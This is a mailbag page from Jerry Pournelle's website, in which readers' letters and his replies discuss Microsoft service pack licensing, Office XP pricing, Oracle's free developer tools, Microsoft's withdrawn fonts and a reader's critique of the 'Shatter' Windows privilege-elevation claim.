I guess what concerns me most about the licensing info is that it is on a Service Pack. If they want to change the terms under which I initially purchase a piece of software, fine, but changing the terms when they issue a service pack seems unfair. If they offer modules for a package that I have licensed that offer added functionality, I guess they can impose any license they want, and I can forego those features if I don't like the terms; but service packs also include patches that make the functionality I originally licensed work correctly, so it's only right that I get them under the original license agreement, not whatever they decide to include when they finally get around to making their software work as it should have in the first place. We would be outraged if someone sold us a defective telephone, then offered us a "free" repair as long as we agreed that they could use it when/if they wanted to; we'd say that they should fix it without any additional impositions on us. Likewise MS.

My two cents. Your columns are generally worth considerably more--although I don't always agree with you, I always find well-thought-out positions in your columns, along with useful information. Thanks for the good work.

Kevin Ryan

Thanks for the kind words.

From Eric:

Office XP a lot cheaper than you may think

http://news.com.com/2100-1001-954779.html 

I'm surprised to realize that I'd completely missed this. In the past there would typically be a high price and a rebate based on qualification, as is still done with many upgrade purchases of major software titles. Instead you can buy the Student/Teacher version of Office XP for $100 to $130 and never be required to show proof of your academic status. If this stealth bargain package does well enough I wonder if they'll just come out in the open and drop the price of regular Office, eliminating price as one of the major advantages of Star Office.

I continue to use Office, although Office XP with Windows XP turns out to be a pain. Office 2000 is mostly what I use. I'll do more testing of Office XP when I get back home: I want to see if it blows up Outlook if I install FrontPage 2000 from Office 2000.

I confess I am pretty unhappy with Windows and Office XP just now: the copy protection stuff gives THEM the security of annoying the customer, while leaving huge security holes...

I often get mail I don't understand. Here is one of them:

Jerry:

I'll let you in on a secret that millions of others already know. Oracle has a great technet ( http://otn.oracle.com/ ). The best part of it's FREEEEEEEEEE!!!

Database - Free

Development Tools --- Free

Portal - Free

Wireless - Free


If you are a developer you are entitled to use their software for a period of time in a development environment.

Time to move up to where the Big Boys are and get rid of the Toys.

Regards

Rich Konopka 

Why would he suppose I should get a letter like that? And is he correct?

On the Font situation:

Here's an interesting letter to the editor on The Register ( http://www.theregister.co.uk/content/4/26764.html ). Apparently, Microsoft may have been forced to withdraw those fonts because at least some of them were licensed to Microsoft only for use with Microsoft operating systems.

If that's true, we have an interesting situation. Microsoft apparently posted the fonts as "free" (as in beer) without any restrictions on the OS with which they could be used. If those fonts were originally licensed to Microsoft only for use with MS OS's, that means that Microsoft has violated the copyrights and license terms of the font foundry(s) that created the fonts, because the EULA included with the fonts makes no mention of them being limited to use with Windows. Presumably, that makes Microsoft subject to some pretty hefty financial penalties, possibly even per-incident. I wonder how they could ever establish how many people who downloaded the fonts used them with non-MS operating systems.

-- Robert Bruce Thompson
thompson@ttgnet.com
http://www.ttgnet.com

=====

And something serious on Shatter. I expect many comments on this:

Dear Mr. Pournelle,

I've been reading and enjoying your columns since the good old days of paper-based Byte so, I guess, the first thing I'd like to do is thank you for all the good reading you've provided me.

I'm writing to you specifically about the "unfixable security flaw" (or shatter attack). It has raised much noise in the NT security world, mostly because, while it does find a local privilege elevation flaw, it is also very, very far from what it claims to be: an unfixable flaw in the Windows API.

In effect, that "flaw" has been documented since at least 1997 when Matt Pietrek published an article in MSJ about this potential problem. His conclusion was that no application should trust blindly what it gets from messages.

Second, this flaw is actually in the McAfee antivirus software, not the Win32 API. It seems the authors of that software didn't properly understand the concept of security as it is under NT-based operating systems: they just let privileged programs run a user interface in the context of a normal user, and this specific interface DOES trust blindly the messages it gets from Windows.

If you feel like doing some more research on the subject, I would suggest you stop by the NTBugtraq mailing list ( http://www.ntbugtraq.com/ ) and have a look at last month's archives.

Like in the Gibson case, there is a layer of truth beneath this vulnerability. But it is mostly an act of someone wanting to make himself a great deal more important than he really is.

Best regards, Stephane Grobety

--- All computers run at the same speed...with the power off.

And I will have more to say on this next week.

Entire Site Copyright, 1998, 1999, 2000, 2001, 2002 by Jerry E. Pournelle. All rights reserved.
